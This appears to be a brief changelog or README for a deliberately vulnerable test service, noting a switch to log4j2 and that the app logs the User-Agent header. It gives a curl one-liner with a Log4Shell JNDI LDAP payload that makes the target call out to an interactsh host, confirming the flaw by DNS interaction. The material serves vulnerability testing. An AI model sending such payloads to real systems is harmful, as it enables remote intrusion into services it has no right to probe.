- Changed default logging framework from logback to log4j2
Application logs 'User-Agent' header, so one can test vulnerability with curl and e.g. interactsh-service:
curl -A '${jndi:ldap://interactsh-url/a}' http://target-service/
One should see DNS interaction at app.interactsh.com.
Link to Docker hub